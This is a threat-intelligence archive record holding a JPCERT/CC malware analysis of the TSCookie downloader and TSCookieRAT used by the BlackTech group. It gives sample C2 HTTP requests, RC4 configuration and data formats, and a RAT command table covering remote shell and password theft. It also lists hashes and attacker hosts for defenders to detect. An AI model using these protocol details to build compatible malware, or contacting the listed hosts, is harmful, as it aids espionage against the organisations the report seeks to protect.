{ "id": "9030abea-4a0a-46bc-bce9-2cd768e7191b", "created_at": "2026-04-06T15:54:20.552386Z", "updated_at": "2026-04-10T13:12:03.166121Z", "deleted_at": null, "sha1_hash": "3e2c93a53f0884a2084346fc97ff4dadfc79a05a", "title": "Malware “TSCookie” - JPCERT/CC Eyes", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 753778, "plain_text": "Malware “TSCookie” - JPCERT/CC Eyes\r\nBy 朝長 秀誠 (Shusei Tomonaga)\r\nPublished: 2018-03-05 · Archived: 2026-04-06 15:16:22 UTC\r\nMarch 6, 2018\r\nTool\r\nBlackTech\r\nAround 17 January 2018, there were some reports on the social media about malicious emails purporting to be\r\nfrom Ministry of Education, Culture, Sports, Science and Technology of Japan [1]. This email contains a URL\r\nleading to a malware called “TSCookie”. (Trend Micro calls it “PLEAD” malware [2]. Since PLEAD is also\r\nreferred to as an attack campaign, we call this malware TSCookie in this article.) TSCookie has been observed in\r\nthe wild since 2015, and it is suspected that an attacker group “BlackTech” is related to this campaign [3].\r\nJPCERT/CC confirmed that adversaries using the malware had conducted targeted attacks against Japanese\r\norganisations in the past. This article presents findings from TSCookie analysis.\r\nOverview of TSCookie\r\nFigure 1 describes the flow of TSCookie’s execution.\r\nFigure 1: Overview of TSCookie\r\nhttps://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html\r\nPage 1 of 13\n\nTSCookie itself only serves as a downloader. It expands functionality by downloading modules from C\u0026C\r\nservers. The sample that was examined downloaded a DLL file which has exfiltrating function among many others\r\n(hereafter “TSCookieRAT”). Downloaded modules only runs on memory.\r\nBehaviour of TSCookie and TSCookieRAT will be explained in detail in the following sections.\r\nBehaviour of TSCookie\r\nTSCookie communicates to C\u0026C servers using HTTP protocol and downloads “a module” and “a loader” for\r\nloading the module. The malware has an encrypted DLL file in its resource. When the malware is executed, the\r\nDLL file is loaded and executed on memory. The DLL file performs main functions such as communicating with\r\nC\u0026C servers. (In some cases, the main function part is not encrypted and stored in the malware as is. Also, some\r\nsamples launch another process and inject decrypted DLL file.) The malware has configuration information\r\nencrypted with RC4, including C\u0026C server information. Please refer to Appendix A for the details of the\r\nconfiguration.\r\nBelow is an example of an HTTP GET request that TSCookie sends at the beginning. The outbound message is\r\nencoded and included in the Cookie header.\r\nGET /Default.aspx HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\nDate: Thu, 18 Jan 2018 10:20:55 GMT\r\nhttps://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html\r\nPage 2 of 13\n\nPragma: no-cache\r\nAccept: */*\r\nCookie: 1405D7CD01C6978E54E86DA9525E1395C4DD2F276DD28EABCC3F6201ADAA66F55C15352D29D0FFE51BC9D431EB23E8E58959653D\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)\r\nHost:[host name]:443\r\nThe data contained in the Cookie header is encrypted with RC4 (The key is the Date header value). Please refer to\r\nAppendix B, Table B-1 for the data format.\r\nThe data obtained by this HTTP GET request is RC4-encrypted with the 8byte value which is made up with the\r\nfixed value in the configuration (Appendix A, Table A-1) and the value in the sent data (“4byte generated from\r\nsystem information” in Appendix B, Table B-1). This data includes loader for the module.\r\nTSCookie then downloads a module. Below is an example of HTTP POST request for downloading a module.\r\nPOST /Default.aspx HTTP/1.1\r\nConnection: Keep-Alive\r\nDate: Thu, 18 Jan 2018 10:30:55 GMT\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)\r\nContent-Length: 34\r\nHost: [host name]:443\r\n[data]\r\nThe sent data is RC4-encrypted as well (the key is the Date header value). Please refer to Appendix B, Table B-2\r\nfor the data format. The data obtained by this HTTP POST request is RC4-encrypted with the same key as in the\r\nHTTP GET request. The downloaded module can be executed by loading it on memory and calling the loader\r\nobtained by the HTTP GET request.\r\nBehaviour of TSCookieRAT\r\nTSCookie provides parameters such as C\u0026C server information when loading TSCookieRAT. Upon the execution,\r\ninformation of the infected host is sent with HTTP POST request to an external server. (The HTTP header format\r\nis the same as TSCookie.)\r\nThe data is RC4-encrypted from the beginning to 0x14 (the key is Date header value), which is followed by the\r\ninformation of the infected host (host name, user name, OS version, etc.). Please refer to Appendix C, Table C-1\r\nfor the data format.\r\nFigure 2 is an example of sent data (decoded).\r\nhttps://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html\r\nPage 3 of 13\n\nFigure 2: Part of sent data (decoded): Sending out information on the infected hosts)\r\nAfter that, TSCookieRAT sends an HTTP GET request. (The HTTP header payload is the same as TSCookie.)\r\nWith this request, commands are sent from a C\u0026C server, and TSCookieRAT executes functions as listed below.\r\n(Please refer to Appendix C, Table C-2 for received data, and to Appendix D, Table D-1 for the list of commands.)\r\nExecute arbitrary shell command\r\nSend drive information\r\nSend system information\r\nFile operation\r\nCollect passwords from Internet Explorer, Edge, Firefox, Chrome, Outlook\r\nThe result of command execution is sent in the same format as in the first HTTP POST request (for sending the\r\ninformation of the infected host). The commands sent from a C\u0026C server are not encoded. Below is the example\r\nof sent data (decoded) when executing a command for listing processes and modules.\r\nFigure 3: Part of sent data (decoded): Result of the command 0x930 execution\r\nhttps://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html\r\nPage 4 of 13\n\nTSCookie Decode Tool\r\nJPCERT/CC made a tool to decode and extract TSCookie’s configuration information. This is available on Github\r\nfor your use.\r\nJPCERTCC/aa-tools · GitHub\r\nhttps://github.com/JPCERTCC/aa-tools/blob/master/tscookie_decode.py\r\nFigure 4: Running tscookie_decode.py (example)\r\nhttps://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html\r\nPage 5 of 13\n\nIn closing\r\nThe adversaries using TSCookie have been conducting attacks against Japanese organisations using various types\r\nof malware. As this attack campaign is likely to continue, JPCERT/CC will continue to watch the trend carefully.\r\nThe hash value of the samples that were examined for this article are listed in Appendix E. Some of the destination\r\nhosts associated with TSCookie are also listed in Appendix F. Please make sure that none of your devices is\r\ncommunicating with such hosts.\r\nFor any inquiries, please contact global-cc[at]jpcert.or.jp.\r\n- Shusei Tomonaga\r\n(Translated by Yukako Uchida)\r\nReference\r\n[1] piyolog: Summary on Ministry of Education, Culture, Sports, Science and Technology Scam in January 2018\r\n(Japanese)\r\nhttp://d.hatena.ne.jp/Kango/20180119/1516391079\r\nhttps://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html\r\nPage 6 of 13\n\n[2] Trend Micro: Following the Trail of BlackTech’s Cyber Espionage Campaigns\r\nhttps://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf\r\n[3] Trend Micro: Following the Trail of BlackTech’s Cyber Espionage Campaigns\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/\r\nAppendix A: TSCookie configuration information\r\nTable A: List of configuration information\r\nOffset Description Remarks\r\n0x000 Flag for host 1 Perform communication if 0x01\r\n0x004 Port number 1 for host 1  \r\n0x008 Port number 2 for host 1  \r\n0x010 Host 1  \r\n0x100 Flag for host 2  \r\n0x104 Port number 1 for host 2  \r\n0x108 Port number 2 for host 2  \r\n0x110 Host 2  \r\n0x200 Flag for host 3  \r\n0x204 Port number 1 for host 3  \r\n0x208 Port number 2 for host 3  \r\n0x210 Host 3  \r\n0x300 Flag for host 4  \r\n0x304 Port number 1 for host 4  \r\n0x308 Port number 2 for host 4  \r\n0x310 Host 4  \r\n0x400 Proxy server  \r\n0x480 Proxy port number  \r\n0x484 Flag for proxy configuration  \r\nhttps://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html\r\nPage 7 of 13\n\nOffset Description Remarks\r\n0x500 ID  \r\n0x604 Fixed value RC4 key for 4byte (0x925A765D)\r\n0x89C Suspended time  \r\nAppendix B Data that TSCookie sends/receives\r\nTable B-1: Format of data contained in Cookie header\r\nOffset Length Contents\r\n0x00 4 4byte generated from system information (*)\r\n0x04 4 0x10050014\r\n0x08 4 0x10001\r\n0x0C 4 0xAB1\r\n0x10 4 0x04\r\n0x14 4 4byte generated from system information\r\n0x18 - Random data\r\n(*) RC4-encrypted with the fixed value (0x925A765D)\r\nTable B-2: Format of data contained in HTTP POST data\r\nOffset Length Contents\r\n0x00 4 4byte generated from system information\r\n0x04 4 0x10050014\r\n0x08 4 0x10001\r\n0x0C 4 0xAAD\r\n0x10 4 Data length after 0x14\r\n0x14 - Random data\r\nAppendix C: Data that TSCookieRAT sends/receives\r\nTable C-1: Format of data contained in HTTP POST data\r\nOffset Length Contents\r\nhttps://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html\r\nPage 8 of 13\n\nOffset Length Contents\r\n0x00 4 4byte generated from system information\r\n0x04 4 0x10050014\r\n0x08 4 0x10001\r\n0x0C 4 0xAAD\r\n0x10 4 Data length after 0x14\r\n0x14 -\r\nInformation of the infected host (RC4 encrypted with the key for “4byte generated from\r\nsystem information”)\r\n*RC4-encrypted with Date header value up to 0x14\r\nTable C-2: Format of data received\r\nOffset Length Contents\r\n0x00 4 Command\r\n0x04 4 Data length after 0x8\r\n0x08 - Parameter\r\nAppendix D: Commands used by TSCookieRAT\r\nTable D-1: List of commands\r\nValue Contents\r\n0x912 Configure suspended time\r\n0x930 List processes and modules\r\n0x932 Terminate\r\n0x934 Start remote shell\r\n0x935 Execute remote shell command\r\n0x936 End remote shell\r\n0x946 Obtain IP address\r\n0x950 Execute files (with window display)\r\n0x951 Execute files (without window display)\r\n0x952 Send message\r\nhttps://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html\r\nPage 9 of 13\n\nValue Contents\r\n0x953 Send drive information\r\n0x954 Send file list\r\n0x955 Send file size\r\n0x956 Send file\r\n0x957 Close object handle\r\n0x958 Select file to send (send file with 0x955, 0x956)\r\n0x959 Download file\r\n0x95A Delete file\r\n0x95C Move file\r\n0x95E -\r\n0x960 -\r\n0x96B Obtain window title\r\n0x96E Collect password from Internet Explorer, Edge, Firefox, Chrome, Outlook\r\nAppendix E: SHA-256 values of the samples\r\nTSCookie\r\n6d2f5675630d0dae65a796ac624fb90f42f35fbe5dec2ec8f4adce5ebfaabf75\r\ncdf0e4c415eb55bccb43a650e330348b63bc3cbb53f71a215c44ede939b4b830\r\n17f1996ad7e602bd2a7e9524d7d70ee8588dac51469b08017df9aaaca09d8dd9\r\n1fa7cbe57eedea0ebc8eb37b91e7536c07be7da7775a6c01e5b14489387b9ca8\r\ne451a1e05c0cc363a185a98819cd2af421ac87154702bf72007ecc0134c7f417\r\n1da9b4a84041b8c72dad9626db822486ce47b9a3ab6b36c41b0637cd1f6444d6\r\n35f966187098ac42684361b2a93b0cee5e2762a0d1e13b8d366a18bccf4f5a91\r\n0683437aebd980c395a83e837a6056df1a21e137e875f234d1ed9f9a91dfdc7f\r\n0debbcc297cb8f9b81c8c217e748122243562357297b63749c3847af3b7fd646\r\n96306202b0c4495cf93e805e9185ea6f2626650d6132a98a8f097f8c6a424a33\r\n6b66c6d8859dfe06c0415be4df2bd836561d5a6eabce98ddd2ee54e89e37fd44\r\n06a9c71342eeb14b7e8871f77524e8acc7b86670411b854fa7f6f57c918ffd2b\r\n20f7f367f9cb8beca7ce1ba980fafa870863245f27fea48b971859a8cb47eb09\r\nf16befd79b7f8ffdaf934ef337a91a5f1dc6da54c4b2bee5fe7a0eb38e8af39e\r\n12b0f1337bda78f8a7963d2744668854d81e1f1b64790b74d486281bc54e6647\r\n201bf3cd2a723d6c728d18a9e41ff038549eac8406f453c5197a1a7b45998673\r\nhttps://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html\r\nPage 10 of 13\n\n5443ee54a532846da3182630e2bb031f54825025700bcd5f0e34802e7345c7b2\r\n39d7d764405b9c613dff6da4909d9bc46620beee7a7913c4666acf9e76a171e4\r\nafe780ba2af6c86babf2d0270156da61f556c493259d4ca54c67665c17b02023\r\n4a8237f9ecdad3b51ffd00d769e23f61f1e791f998d1959ad9b61d53ea306c09\r\n203c924cd274d052e8e95246d31bd168f3d8a0700a774c98eff882c8b8399a2f\r\nTSCookieRAT\r\n2bd13d63797864a70b775bd1994016f5052dc8fd1fd83ce1c13234b5d304330d\r\nAppendix F: Destination hosts associated with TSCookie\r\n220.130.216.76\r\n60.244.52.29\r\n45.76.102.145\r\njpcerts.jpcertinfo.com\r\njpcert.ignorelist.com\r\ntwnicsi.ignorelist.com\r\ntwcertcc.jumpingcrab.com\r\nokinawas.ssl443.org\r\napk36501.flnet.org\r\nappinfo.fairuse.org\r\ncarcolors.effers.com\r\nedu.microsoftmse.com\r\neoffice.etowns.org\r\nepayplus.flnet.org\r\nfatgirls.fatdiary.org\r\ngethappy.effers.com\r\niawntsilk.dnset.com\r\ninewdays.csproject.org\r\nktyguxs.dnset.com\r\nlang.suroot.com\r\nlanglang.dnset.com\r\nlongdays.csproject.org\r\nlookatinfo.dnset.com\r\nnewtowns.flnet.org\r\nntp.ukrootns1.com\r\noffice.dns04.com\r\nsavecars.dnset.com\r\nsplashed.effers.com\r\nsslmaker.ssl443.org\r\nhttps://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html\r\nPage 11 of 13\n\n朝長 秀誠 (Shusei Tomonaga)\r\nSince December 2012, he has been engaged in malware analysis and forensics investigation, and is especially\r\ninvolved in analyzing incidents of targeted attacks. Prior to joining JPCERT/CC, he was engaged in security\r\nmonitoring and analysis operations at a foreign-affiliated IT vendor. He presented at CODE BLUE, BsidesLV,\r\nBlackHat USA Arsenal, Botconf, PacSec and FIRST Conference. JSAC organizer.\r\nRelated articles\r\nUpdate on Attacks by Threat Group APT-C-60\r\nCrossC2 Expanding Cobalt Strike Beacon to Cross-Platform Attacks\r\nhttps://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html\r\nPage 12 of 13\n\nMalware Identified in Attacks Exploiting Ivanti Connect Secure Vulnerabilities\r\nDslogdRAT Malware Installed in Ivanti Connect Secure\r\nTempted to Classifying APT Actors: Practical Challenges of Attribution in the Case of Lazarus’s Subgroup\r\nSource: https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html\r\nhttps://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "origins": [ "web" ], "references": [ "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html" ], "report_names": [ "malware-tscooki-7aa0.html" ], "threat_actors": [ { "id": "15b8d5d8-32cf-408b-91b1-5d6ac1de9805", "created_at": "2023-07-20T02:00:08.724751Z", "updated_at": "2026-04-10T02:00:03.341845Z", "deleted_at": null, "main_name": "APT-C-60", "aliases": [ "APT-Q-12" ], "source_name": "MISPGALAXY:APT-C-60", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "efa7c047-b61c-4598-96d5-e00d01dec96b", "created_at": "2022-10-25T16:07:23.404442Z", "updated_at": "2026-04-10T02:00:04.584239Z", "deleted_at": null, "main_name": "BlackTech", "aliases": [ "BlackTech", "Canary Typhoon", "Circuit Panda", "Earth Hundun", "G0098", "Manga Taurus", "Operation PLEAD", "Operation Shrouded Crossbow", "Operation Waterbear", "Palmerworm", "Radio Panda", "Red Djinn", "T-APT-03", "TEMP.Overboard" ], "source_name": "ETDA:BlackTech", "tools": [ "BIFROST", "BUSYICE", "BendyBear", "Bluether", "CAPGELD", "DRIGO", "Deuterbear", "Flagpro", "GOODTIMES", "Gh0stTimes", "IconDown", "KIVARS", "LOLBAS", "LOLBins", "Linopid", "Living off the Land", "TSCookie", "Waterbear", "XBOW", "elf.bifrose" ], "source_id": "ETDA", "reports": null }, { "id": "2646f776-792a-4498-967b-ec0d3498fdf1", "created_at": "2022-10-25T15:50:23.475784Z", "updated_at": "2026-04-10T02:00:05.269591Z", "deleted_at": null, "main_name": "BlackTech", "aliases": [ "BlackTech", "Palmerworm" ], "source_name": "MITRE:BlackTech", "tools": [ "Kivars", "PsExec", "TSCookie", "Flagpro", "Waterbear" ], "source_id": "MITRE", "reports": null }, { "id": "ab47428c-7a8e-4ee8-9c8e-4e55c94d2854", "created_at": "2024-12-28T02:01:54.668462Z", "updated_at": "2026-04-10T02:00:04.564201Z", "deleted_at": null, "main_name": "APT-C-60", "aliases": [ "APT-Q-12" ], "source_name": "ETDA:APT-C-60", "tools": [ "SpyGlace" ], "source_id": "ETDA", "reports": null }, { "id": "75024aad-424b-449a-b286-352fe9226bcb", "created_at": "2023-01-06T13:46:38.962724Z", "updated_at": "2026-04-10T02:00:03.164536Z", "deleted_at": null, "main_name": "BlackTech", "aliases": [ "CIRCUIT PANDA", "Temp.Overboard", "Palmerworm", "G0098", "T-APT-03", "Manga Taurus", "Earth Hundun", "Mobwork", "HUAPI", "Red Djinn", "Canary Typhoon" ], "source_name": "MISPGALAXY:BlackTech", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3b93ef3c-2baf-429e-9ccc-fb80d0046c3b", "created_at": "2025-08-07T02:03:24.569066Z", "updated_at": "2026-04-10T02:00:03.730864Z", "deleted_at": null, "main_name": "BRONZE CANAL", "aliases": [ "BlackTech", "CTG-6177 ", "Circuit Panda ", "Earth Hundun", "Palmerworm ", "Red Djinn", "Shrouded Crossbow " ], "source_name": "Secureworks:BRONZE CANAL", "tools": [ "Bifrose", "DRIGO", "Deuterbear", "Flagpro", "Gh0stTimes", "KIVARS", "PLEAD", "Spiderpig", "Waterbear", "XBOW" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775490860, "ts_updated_at": 1775826723, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/3e2c93a53f0884a2084346fc97ff4dadfc79a05a.pdf", "text": "https://archive.orkl.eu/3e2c93a53f0884a2084346fc97ff4dadfc79a05a.txt", "img": "https://archive.orkl.eu/3e2c93a53f0884a2084346fc97ff4dadfc79a05a.jpg" } }